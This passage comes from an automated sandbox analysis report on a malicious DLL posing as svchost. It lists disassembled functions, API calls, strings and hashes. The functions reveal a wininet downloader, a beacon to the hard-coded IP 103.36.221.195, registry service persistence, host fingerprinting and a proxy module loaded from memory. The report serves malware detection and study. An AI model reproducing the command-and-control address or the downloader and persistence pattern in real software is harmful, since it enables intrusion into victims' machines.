                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$Load$Free$CloseHandle
                                                                                          • String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$SeShutdownPrivilege$kernel32.dll
                                                                                          • API String ID: 2887716753-2040270271
                                                                                          • Opcode ID: 2c02e0a2dce957ed4b170e4857a5501a8461009b11209441a4d50c6b9b6a2af3
                                                                                          • Instruction ID: 8d4d7167a0abf61afb389703d9ccc16411aa1da686c4766c6b67e9c280f51853
                                                                                          • Opcode Fuzzy Hash: 2c02e0a2dce957ed4b170e4857a5501a8461009b11209441a4d50c6b9b6a2af3
                                                                                          • Instruction Fuzzy Hash: DD2148B1D04218BAEB01EBF58C48FEFBFB8EF48391F114465E605E2144DB759A448BA0
                                                                                          Function 10004529 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 115libraryloaderfileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 108 10004529-10004576 LoadLibraryA GetProcAddress 110 10004597-10004599 108->110 111 10004578-10004595 GetProcAddress 108->111 112 100045a2-100045a4 110->112 113 1000459b-1000459c FreeLibrary 110->113 111->110 116 100045a9-100045c3 CreateFileA 111->116 115 10004661-10004665 112->115 113->112 117 100045c5 116->117 118 10004637-10004655 Sleep GetProcAddress 116->118 119 100045ca-100045f9 memset GetProcAddress 117->119 125 10004657-10004658 FreeLibrary 118->125 126 1000465e 118->126 123 10004606-10004624 WriteFile 119->123 124 100045fb-10004604 119->124 128 10004626 123->128 129 1000462b-10004634 CloseHandle 123->129 124->123 127 10004628 124->127 125->126 126->115 127->129 128->119 129->118
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(wininet.dll,?,00000001,00000000), ref: 1000454D
                                                                                          • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 10004564
                                                                                          • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 1000457E
                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000001,00000000), ref: 1000459C
                                                                                          • CreateFileA.KERNEL32(10002CDC,40000000,00000000,00000000,00000002,00000000,00000000,?,00000001,00000000), ref: 100045B7
                                                                                          • memset.MSVCRT ref: 100045D3
                                                                                          • GetProcAddress.KERNEL32(10002CDC,InternetReadFile), ref: 100045E3
                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,00000001,00000000), ref: 1000461B
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000001,00000000), ref: 1000462E
                                                                                          • Sleep.KERNEL32(00000001,?,00000001,00000000), ref: 10004639
                                                                                          • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 10004645
                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000001,00000000), ref: 10004658
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWritememset
                                                                                          • String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$MZ$wininet.dll
                                                                                          • API String ID: 2364563185-3604101231
                                                                                          • Opcode ID: 4ccd4711cf4494772635a2f590ae23fe1c53700288b07bfeed38bb136e3ef3db
                                                                                          • Instruction ID: cfdd7e431f84bb68211a12104eaec753c658bf1fa5ec063c49e3443a626c7788
                                                                                          • Opcode Fuzzy Hash: 4ccd4711cf4494772635a2f590ae23fe1c53700288b07bfeed38bb136e3ef3db
                                                                                          • Instruction Fuzzy Hash: 0E3149B180011CBEEB109FA0CC84EEFBFB9EB483D5F118069F605A2154DB365E858AA5
                                                                                          Function 10002D9E Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 136synchronizationsleepstringCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 10002DA3
                                                                                          • wsprintfA.USER32 ref: 10002DD0
                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 10002DE4
                                                                                          • GetLastError.KERNEL32 ref: 10002DF0
                                                                                          • ReleaseMutex.KERNEL32(00000000), ref: 10002DFE
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 10002E05
                                                                                          • rand.MSVCRT ref: 10002E28
                                                                                          • Sleep.KERNEL32 ref: 10002E37
                                                                                          • lstrcatA.KERNEL32(00000000,103.36.221.195), ref: 10002E60
                                                                                          • strcmp.MSVCRT ref: 10002E72
                                                                                          • GetTickCount.KERNEL32 ref: 10002E8A
                                                                                          • GetTickCount.KERNEL32 ref: 10002EA6
                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,?,?,?,00002256), ref: 10002F0F
                                                                                          • Sleep.KERNEL32(000001F4), ref: 10002F1C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CountMutexSleepTick$CloseCreateErrorH_prologHandleLastObjectReleaseSingleWaitlstrcatrandstrcmpwsprintf
                                                                                          • String ID: %s:%d:%s$103.36.221.195$encvbk
                                                                                          • API String ID: 4065721159-1904885736
                                                                                          • Opcode ID: a5af5a3d6a9359322f04e457a363fbda1204055e8f71d46e8cb9e8ff8e7e396c
                                                                                          • Instruction ID: 0aef3fa4da984b37d72cd036fbc76a84f9d8f20caef5abb9300e459f48f97b0e
                                                                                          • Opcode Fuzzy Hash: a5af5a3d6a9359322f04e457a363fbda1204055e8f71d46e8cb9e8ff8e7e396c
                                                                                          • Instruction Fuzzy Hash: 4F41A8358042A5ABFB15DBB4CC88BDE7BB9EF093C0F1040A5E509E3199DF716A44CB51
                                                                                          Function 10004A93 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 144libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 171 10004a93-10004b1b LoadLibraryA GetProcAddress * 6 172 10004b79-10004b95 171->172 173 10004b1d-10004b1e 171->173 175 10004b97-10004bac 172->175 179 10004bf4-10004bff call 10004c1f 172->179 174 10004b20-10004b21 173->174 173->175 177 10004b53-10004b68 174->177 178 10004b23-10004b24 174->178 175->179 183 10004bae-10004bb3 175->183 177->179 188 10004b6e-10004b77 177->188 178->179 180 10004b2a-10004b3f 178->180 189 10004c01-10004c02 FreeLibrary 179->189 190 10004c08-10004c19 179->190 180->179 191 10004b45-10004b4e 180->191 183->179 187 10004bb5-10004bb8 183->187 192 10004bd0-10004bde lstrlenA 187->192 193 10004bba-10004bbd 187->193 200 10004be9-10004beb 188->200 189->190 191->200 196 10004bdf-10004be3 192->196 194 10004bc6-10004bce 193->194 195 10004bbf-10004bc2 193->195 194->196 195->192 199 10004bc4 195->199 196->200 199->179 200->179 201 10004bed 200->201 201->179
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,00000000,?), ref: 10004AC0
                                                                                          • GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 10004AD7
                                                                                          • GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 10004AE2
                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 10004AED
                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 10004AF8
                                                                                          • GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 10004B03
                                                                                          • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 10004B0E
                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 10004C02
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                          • String ID: ADVAPI32.dll$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA
                                                                                          • API String ID: 2449869053-3188892968
                                                                                          • Opcode ID: b9fec3eb9a562a6a9266f8090f520ea499f34599839294b39172511a198aaae8
                                                                                          • Instruction ID: 2058804bda021c861d2603192b8c2d3dc199326d0aa42d29f4cfa0892e9c0375
                                                                                          • Opcode Fuzzy Hash: b9fec3eb9a562a6a9266f8090f520ea499f34599839294b39172511a198aaae8
                                                                                          • Instruction Fuzzy Hash: E741E3B1900259BFFF11DF94DC84EEEBAB9FB08695F114026FA24A2168DB318C159B64
                                                                                          Function 10001603 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 181COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 10001608
                                                                                          • memcmp.MSVCRT(?,?,00000003,00000000,00000000,00002000), ref: 10001635
                                                                                          • memcpy.MSVCRT(00000003,00000000,00000003,00000000,?,00000003,00000000,00000000,00002000), ref: 1000169E
                                                                                          • memcmp.MSVCRT(00000003,00000003,00000003,00000003,00000000,00000003,00000000,?,00000003,00000000,00000000,00002000), ref: 100016AD
                                                                                          • _CxxThrowException.MSVCRT(?,10005370), ref: 100016C9
                                                                                          • memcpy.MSVCRT(?,00000000,00000004,00000003,00000000,?,00000003,00000000,00000000,00002000), ref: 100016E1
                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?,00000003,00000000), ref: 10001743
                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?,00000003,00000000), ref: 1000174F
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 100017A7
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 100017B0
                                                                                          • _CxxThrowException.MSVCRT(?,10005370), ref: 100017CD
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,10005370,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 100017DC
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,10005370,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 100017EA
                                                                                            • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001884
                                                                                            • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 1000189C
                                                                                            • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018F3
                                                                                            • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018FB
                                                                                            • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,00000001,00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?), ref: 1000190A
                                                                                            • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000000,00000144,00000001,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 10001932
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ??3@$??2@memcpy$ExceptionThrowmemcmp$H_prolog
                                                                                          • String ID: P`$``
                                                                                          • API String ID: 1493374972-3525061398
                                                                                          • Opcode ID: 10262e34717a2dc6bb8153166a79431bc9c49f8163c052bb3b4c512cb2356511
                                                                                          • Instruction ID: 8fe5d1832865b8ccca8e0fc317077c96d8ecfcaf39360939d2f87a7bcfb0ed6c
                                                                                          • Opcode Fuzzy Hash: 10262e34717a2dc6bb8153166a79431bc9c49f8163c052bb3b4c512cb2356511
                                                                                          • Instruction Fuzzy Hash: 1E51B4B5A00109ABFF44DFA4CD82EEEB7BAFF48680F004019F605A7185DF75AA50CB95
                                                                                          Function 100031D2 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 120libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 260 100031d2-10003244 LoadLibraryA GetProcAddress * 3 LoadLibraryA GetProcAddress 263 10003246-1000325b 260->263 264 1000325d-1000325f 260->264 263->264 267 10003264-10003268 263->267 265 100032f2-100032f6 264->265 268 1000326d-10003282 267->268 270 10003284-1000329a 268->270 271 100032d5-100032e0 268->271 276 100032ca-100032d3 270->276 277 1000329c-100032b7 270->277 274 100032e2-100032e3 FreeLibrary 271->274 275 100032e5-100032e8 271->275 274->275 278 100032ea-100032ed FreeLibrary 275->278 279 100032ef 275->279 276->268 282 100032c1-100032c5 277->282 283 100032b9-100032bc 277->283 278->279 279->265 282->276 283->282
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(Ole32.dll,?,00000144,00000000), ref: 100031E6
                                                                                          • GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 100031F6
                                                                                          • GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 10003201
                                                                                          • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 1000320C
                                                                                          • LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,?,100037D5), ref: 10003216
                                                                                          • GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 10003221
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,100037D5), ref: 100032E3
                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,100037D5), ref: 100032ED
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$FreeLoad
                                                                                          • String ID: CoCreateInstance$CoInitialize$CoUninitialize$FriendlyName$Ole32.dll$Oleaut32.dll$SysFreeString
                                                                                          • API String ID: 2256533930-3340630095
                                                                                          • Opcode ID: f1eadba59b2ebd071f72d2f7cbb709308b938fb940b81a85d55ffd123040d419
                                                                                          • Instruction ID: 1885695b6b8551886770f00f979ae30a25f1f1d427a69892d216d7985a67bda5
                                                                                          • Opcode Fuzzy Hash: f1eadba59b2ebd071f72d2f7cbb709308b938fb940b81a85d55ffd123040d419
                                                                                          • Instruction Fuzzy Hash: 1641EA70A00219AFEB01DBA5CC88DEFBBBDFF89795B208459F505E7258D7719901CBA0
                                                                                          Function 10004369 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 75libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 293 10004369-10004416 LoadLibraryA GetProcAddress * 4 LoadLibraryA GetProcAddress 297 10004425-10004428 293->297 298 10004418-10004423 293->298 299 1000442e-10004448 call 1000444c 297->299 298->297 302 1000442a 298->302 302->299
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(user32.dll,00000000,00000000,00000000), ref: 1000439A
                                                                                          • GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 100043AD
                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 100043B8
                                                                                          • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 100043C3
                                                                                          • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 100043D1
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 100043DB
                                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 100043E6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                          • String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$user32.dll
                                                                                          • API String ID: 2238633743-588083535
                                                                                          • Opcode ID: 4c1376e7f27bce54e3710619517fe6f641db0fdfb4de06b67931ee9d63f56ed5
                                                                                          • Instruction ID: 67ebd5df9d46fa76e82372fdf0c3b5a8e4a25dc64441a3b0318b74b919e85c2a
                                                                                          • Opcode Fuzzy Hash: 4c1376e7f27bce54e3710619517fe6f641db0fdfb4de06b67931ee9d63f56ed5
                                                                                          • Instruction Fuzzy Hash: 212107B1D00228BBEB10EFA5DC44BEEBAFDEB48391F114126F911F2254DB7459408F64
                                                                                          Function 100036BA Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 108stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 100036D4
                                                                                          • wsprintfA.USER32 ref: 100036F4
                                                                                          • lstrlenA.KERNEL32(?,00000000), ref: 10003706
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                            • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004885
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                            • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004A63
                                                                                          • memset.MSVCRT ref: 10003738
                                                                                          • getsockname.WS2_32(?,?,?), ref: 10003751
                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 10003764
                                                                                            • Part of subcall function 100035EA: lstrlenA.KERNEL32(?,?,1000377E,?,00000032,?,?,?,00000004), ref: 10003611
                                                                                            • Part of subcall function 100035EA: gethostname.WS2_32(?,?), ref: 10003621
                                                                                          • GetVersionExA.KERNEL32(?), ref: 10003792
                                                                                            • Part of subcall function 1000358C: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 100035C9
                                                                                            • Part of subcall function 1000358C: wsprintfA.USER32 ref: 100035DE
                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 100037B0
                                                                                            • Part of subcall function 100031D2: LoadLibraryA.KERNEL32(Ole32.dll,?,00000144,00000000), ref: 100031E6
                                                                                            • Part of subcall function 100031D2: GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 100031F6
                                                                                            • Part of subcall function 100031D2: GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 10003201
                                                                                            • Part of subcall function 100031D2: GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 1000320C
                                                                                            • Part of subcall function 100031D2: LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,?,100037D5), ref: 10003216
                                                                                            • Part of subcall function 100031D2: GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 10003221
                                                                                            • Part of subcall function 1000366A: LoadLibraryA.KERNEL32(kernel32.dll,?,00000144,00000000,?,?,100037E0), ref: 10003676
                                                                                            • Part of subcall function 1000366A: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1000368E
                                                                                            • Part of subcall function 1000366A: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 10003698
                                                                                            • Part of subcall function 1000366A: FreeLibrary.KERNEL32(00000000), ref: 100036AC
                                                                                            • Part of subcall function 10003629: lstrlenA.KERNEL32(00000014,?,?,?,?,100037FD,?,00000014,?), ref: 10003650
                                                                                            • Part of subcall function 10003629: lstrcpyA.KERNEL32(00000014,Error,?,?,?,?,100037FD,?,00000014,?), ref: 10003662
                                                                                          • lstrcpyA.KERNEL32(?,10006514), ref: 10003809
                                                                                            • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001884
                                                                                            • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 1000189C
                                                                                            • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018F3
                                                                                            • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018FB
                                                                                            • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,00000001,00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?), ref: 1000190A
                                                                                            • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000000,00000144,00000001,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 10001932
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$memset$Load$lstrlenmemcpy$??2@??3@Freelstrcpywsprintf$GlobalInfoMemoryStatusSystemVersiongethostnamegetsockname
                                                                                          • String ID: @$Group$SYSTEM\CurrentControlSet\Services\%s$encvbk
                                                                                          • API String ID: 1875266911-2108995110
                                                                                          • Opcode ID: 955314d3c9f2b6115b712ce9295eb8f3d277e00088749fc94f886e12991fb5ce
                                                                                          • Instruction ID: 3133a6343b416fd9d4de8abc7d75c938e5c6614370202d51db2fcbf0203c4673
                                                                                          • Opcode Fuzzy Hash: 955314d3c9f2b6115b712ce9295eb8f3d277e00088749fc94f886e12991fb5ce
                                                                                          • Instruction Fuzzy Hash: 2C41FDB690121CAAEB10DBA4CC49FCEB7BCEB08340F104496F609E7195DB74AB448FA1
                                                                                          Function 100024AC Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 76COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • printf.MSVCRT ref: 100024B8
                                                                                          • printf.MSVCRT ref: 100024C9
                                                                                          • memset.MSVCRT ref: 100024FC
                                                                                          • memcpy.MSVCRT(10006CF0,00000000,00000063,10006CF0,00000000,00000063,00000001), ref: 10002505
                                                                                          • ??2@YAPAXI@Z.MSVCRT(-00000064,10006CF0,00000000,00000063,10006CF0,00000000,00000063,00000001), ref: 1000250E
                                                                                          • memcpy.MSVCRT(00000000,00000000,-00000064,-00000064,10006CF0,00000000,00000063,10006CF0,00000000,00000063,00000001), ref: 1000251B
                                                                                          • printf.MSVCRT ref: 10002537
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10002561
                                                                                          • printf.MSVCRT ref: 10002573
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: printf$memcpy$??2@??3@memset
                                                                                          • String ID: Can't load library from memory.$Loop_Proxy$OpenProxy$hmProxy!= NULL
                                                                                          • API String ID: 60333908-620223428
